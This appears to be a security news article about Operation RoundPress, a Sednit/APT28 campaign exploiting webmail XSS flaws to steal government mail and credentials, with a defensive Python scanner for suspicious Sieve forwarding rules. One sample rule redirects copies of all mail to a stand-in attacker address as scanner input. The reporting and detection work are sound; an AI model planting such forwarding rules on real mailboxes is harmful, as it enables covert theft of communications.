Operation RoundPress: How Russian-Linked Hackers Exploit Webmail to Spy on Governments

Cyber espionage is evolving rapidly, and a newly revealed campaign called Operation RoundPress shows just how dangerous these threats have become. This attack is linked to the notorious Russian hacker group Sednit—also known by names like APT28 or Fancy Bear—thought to be connected to Russia’s military intelligence, the GRU. By exploiting vulnerabilities in popular webmail servers such as Roundcube, Horde, MDaemon, and Zimbra, this group is injecting custom JavaScript malware to steal sensitive information from high-profile government and defense targets.

Operation RoundPress was first detected in 2023, initially targeting a known security flaw (CVE-2020-35730) in Roundcube. But in 2024, the campaign dramatically expanded, weaponizing new vulnerabilities including a zero-day in MDaemon (CVE-2024-11182) before patches were available. The attackers begin by sending highly targeted spearphishing emails containing hidden cross-site scripting (XSS) exploits. When victims open these emails in vulnerable webmail clients, malicious JavaScript runs automatically in their browser sessions; it steals login credentials, email content and contacts, and can even bypass two-factor authentication protections.

Researchers from ESET have linked this operation to Sednit with medium confidence due to overlapping infrastructure, phishing styles, and code signatures found in previous Sednit attacks. The campaign primarily focuses on Eastern European governments and defense companies involved in the conflict in Ukraine, but attacks have also been reported in Africa, South America, and various EU countries.

Inside the Attack: The Technical Breakdown

Operation RoundPress uses four custom JavaScript payloads—SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA—each crafted specifically for its target webmail platform. These payloads are heavily obfuscated, employing encrypted configurations and randomized code to slip past detection systems. Once the XSS attack succeeds, the malware:

Harvests credentials by manipulating login forms or presenting fake login screens.
Automatically collects and sends out emails, address books, and account settings.
Establishes persistence by creating forwarding rules, like Sieve scripts in Roundcube.
Extracts two-factor authentication secrets and creates “app passwords” to bypass MFA in MDaemon.

All stolen data is quietly sent to attacker-controlled servers over encrypted HTTPS connections. The infrastructure shows clear overlaps in command-and-control domains and IP addresses, indicating a highly coordinated operation.
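Because the persistence step described above relies on server-side forwarding rules, the kind of check a defender would run is a scan of managed Sieve scripts for redirect actions pointing outside trusted domains. The scanner below is an added example, not code from the report or from any of the affected products; the two scripts it runs on are constructed samples, and the trusted-domain list is an assumption.

```python
import re
from dataclasses import dataclass

# Constructed sample Sieve scripts (not taken from the report) used as scanner input.
BENIGN_SCRIPT = """\
require ["fileinto"];
# redirect "old@example.org" was removed during a mailbox migration
if header :contains "List-Id" "newsletter" {
    fileinto "Lists";
}
"""

SUSPICIOUS_SCRIPT = """\
require ["copy"];
/* copy every message out while leaving the inbox untouched */
if true {
    redirect :copy "collector@example-attacker.test";
    keep;
}
"""

@dataclass
class Finding:
    line: int       # 1-based line of the redirect action in the script
    address: str    # destination mailbox named by the rule
    external: bool  # True when the destination domain is not on the trusted list

# Sieve supports both '#' line comments and '/* */' block comments.
_COMMENT_RE = re.compile(r"#[^\n]*|/\*.*?\*/", re.DOTALL)
# 'redirect' optionally takes ':copy' (RFC 3894) before the quoted address.
_REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"', re.IGNORECASE)

def _strip_comments(script):
    # Blank out comments but keep newlines so reported line numbers stay correct.
    return _COMMENT_RE.sub(lambda m: re.sub(r"[^\n]", " ", m.group(0)), script)

def scan_sieve(script, trusted_domains):
    """Return one Finding per redirect action; external is set for untrusted domains."""
    trusted = {d.lower() for d in trusted_domains}
    clean = _strip_comments(script)
    findings = []
    for m in _REDIRECT_RE.finditer(clean):
        addr = m.group(1)
        domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
        line = clean.count("\n", 0, m.start()) + 1
        findings.append(Finding(line, addr, domain not in trusted))
    return findings

def is_suspicious(script, trusted_domains):
    """True if any redirect in the script forwards mail to an untrusted domain."""
    return any(f.external for f in scan_sieve(script, trusted_domains))
```

Running it across every user's managed Sieve script (Roundcube stores them through ManageSieve on the IMAP server) turns the "audit forwarding rules" advice into a repeatable job.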

The exploited vulnerabilities vary by platform. Roundcube falls prey to XSS flaws in email rendering, MDaemon suffers from a parsing bug allowing arbitrary script execution, Zimbra’s calendar invite headers are improperly sanitized, and Horde faces legacy XSS issues—some attack attempts even appear misconfigured but still reveal the group’s persistence.

The consequences are severe. Throughout 2024, numerous governments and defense contractors across Bulgaria, Ukraine, Romania, Cameroon, Ecuador, Cyprus, Serbia, and other countries faced these attacks. The theft of sensitive communications and credentials seriously undermines operational security, especially amid ongoing geopolitical tensions.

This operation highlights the critical need for rapid patching of webmail servers, combined with layered email security and behavioral monitoring to detect anomalous activity early. Sednit’s swift exploitation of zero-days and refined malware delivery shows just how sophisticated state-backed cyber threats have become.

What Undercode Say:

Operation RoundPress is a textbook example of how cyber espionage groups exploit the smallest security gaps to achieve wide-reaching intelligence gains. Sednit’s approach reflects a deep understanding of webmail architectures and the human element—using spearphishing emails as the entry point. The reliance on cross-site scripting vulnerabilities reveals a larger issue: webmail platforms often fail to sanitize user inputs adequately, leaving critical backdoors open.

By targeting email services, attackers gain access to the heart of digital communication in government and defense sectors. Email servers are treasure troves of confidential strategies, contacts, and sensitive discussions. The addition of stealthy malware that can bypass multi-factor authentication dramatically raises the stakes, signaling that even best practices like MFA are not a silver bullet.

The geographic spread of targets shows a dual focus on the Ukraine conflict and broader intelligence collection, suggesting Sednit’s goals extend beyond regional skirmishes to global strategic espionage. Notably, the operation’s emphasis on persistence mechanisms—such as email forwarding rules—illustrates a long-term surveillance mindset rather than a hit-and-run attack.

Security teams managing webmail infrastructure should take immediate note. Beyond applying patches for known vulnerabilities, organizations must implement advanced anomaly detection on email server behavior, audit forwarding rules frequently, and train users on recognizing phishing attempts. The campaign’s use of heavily obfuscated JavaScript payloads underscores the necessity for robust endpoint protection capable of analyzing script behavior in real time.

Furthermore, the operation serves as a warning about zero-day vulnerabilities and how quickly they can be weaponized. The window between discovery and patching is often exploited by well-funded actors like Sednit. This dynamic underlines the importance of threat intelligence sharing among governments and private sectors, fostering rapid identification and neutralization of emerging threats.

In the bigger picture, Operation RoundPress exemplifies the evolving cyber threat landscape where state-sponsored groups adapt with agility, combining technical innovation with social engineering. As webmail remains a staple of professional communication worldwide, its security will remain a high-value target for espionage campaigns.

Fact Checker Results:

The campaign’s link to Sednit is supported by credible threat intelligence with medium confidence.
Multiple zero-day and known vulnerabilities were exploited across popular webmail platforms.
The primary targets are consistent with known geopolitical hotspots, reinforcing the espionage motive. ✅

Prediction:

Given Sednit’s rapid adoption of new exploits and its focus on critical communication channels, we can expect continued evolution of these attack techniques. Webmail platforms will face increasing pressure to strengthen security measures, possibly integrating more sophisticated behavioral analytics and AI-driven detection to counter stealthy JavaScript malware. Governments and defense sectors must enhance collaboration on cyber threat intelligence and prioritize proactive defense strategies, including zero-trust models and continuous vulnerability assessments. As geopolitical tensions persist, cyber espionage campaigns like Operation RoundPress will likely intensify, expanding their reach to new regions and sectors beyond traditional military and government targets.

References:

Reported By: cyberpress.org